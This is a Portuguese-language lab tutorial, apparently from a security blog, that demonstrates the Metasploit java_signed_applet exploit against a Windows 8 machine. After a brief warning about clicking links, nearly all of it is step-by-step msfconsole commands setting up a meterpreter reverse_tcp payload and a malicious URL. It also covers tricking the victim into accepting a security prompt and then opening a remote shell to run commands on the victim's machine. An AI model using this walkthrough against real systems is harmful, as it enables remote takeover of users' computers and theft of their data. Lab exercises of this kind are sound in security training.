Este vulnerabilidade permite ao invasor obter qualquer dado de um computador como Windows 8, pois através de engenharia social como induzir os usuários a clicaram em links através de textos os imagens esta vulnerabilidade pode ser explorada.
Conscientize amigos e colegas de trabalho para se atentarem aos links que recebem via e-mail, facebook e ente outros para evitarem se serem vítimas desta vulnerabilidade.
Uma forma de evitar é manter sempre o Windows e o Antivirus devidamente atualizados.
Dados Técnicos:
Kali Linux: 10.10.10.130 Windows 8: 10.10.10.129
Passo 01
Execute o MSF Console
root@kali:~# msfconsole
Passo 02
Utilize o exploit java_signed_applet
msf > use exploit/multi/browser/java_signed_applet
Passo 04
Defina o servidor Kali Linux (10.10.10.130) como conexão principal do exploit java_signed_applet
msf exploit (java_signed_applet) > set SRVHOST 10.10.10.130
Passo 05
Defina a porta do servidor Kali Linux (8080) como conexão principal do exploit java_signed_applet
msf exploit (java_signed_applet) > set SRVPORT 8080
Passo 06
Utilize o PAYLOAD reserve_tcp para estabelecer a conexão entre o host e o servidor
msf exploit (java_signed_applet) > set PAYLOAD windows/meterpreter/reverse_tcp
Passo 07
Defina o servidor Kali Linux (10.10.10.130) como conexão principal para o PAYLOAD reverse_tcp
msf exploit (java_signed_applet) > set LHOST 10.10.10.130
Passo 08
Defina a porta do servidor Kali Linux (10.10.10.130) como conexão principal para o PAYLOAD reverse_tcp
msf exploit (java_signed_applet) > set LPORT 4444
Passo 09
Execute o exploit para gerar a URL a ser acessada pelo Windows 8 (https://10.10.10.130:8080/clR8lKjmGpiSXqQ)
msf exploit (java_signed_applet) > exploit
Passo 10
No Windows 8 ao realizar o acesso ao link (https://10.10.10.130:8080/clR8lKjmGpiSXqQ) será exibida uma janela de Advertência de Segurança, aceite o Risco e clique em Executar
Passo 11
Observe que a conexão foi estabelecida com o servidor
Passo 12
Execute o comando sessions para exibir as sessões de conexão
msf exploit (java_signed_applet) > sessions
Passo 13
Estabeleça a conexão na sessão 1
msf exploit (java_signed_applet) > sessions -i 1
Passo 14
Com a conexão estabelecido digite comando utilizados no windows como o ipconfig para visualizar as conexões de rede
meterpreter > ipconfig
Passo 15
Utilize o comando sysinfo para exibir as Informações de Sistema, como o Nome do Computador e versão do Sistema Operacional
meterpreter > sysinfo
Passo 16
Execute o comando shell para exibir o console do Windows 8
meterpreter > shell
Passo 17
Liste todos arquivos/diretórios que estão no Desktop
C:UsersMarcosDesktop>dir
Passo 18
Crie o diretório 100SECURITY
C:UsersMarcosDesktop>mkdir 100SECURITY
Passo 19
Como pode visualizar o diretório 100SECURITY foi criado com sucesso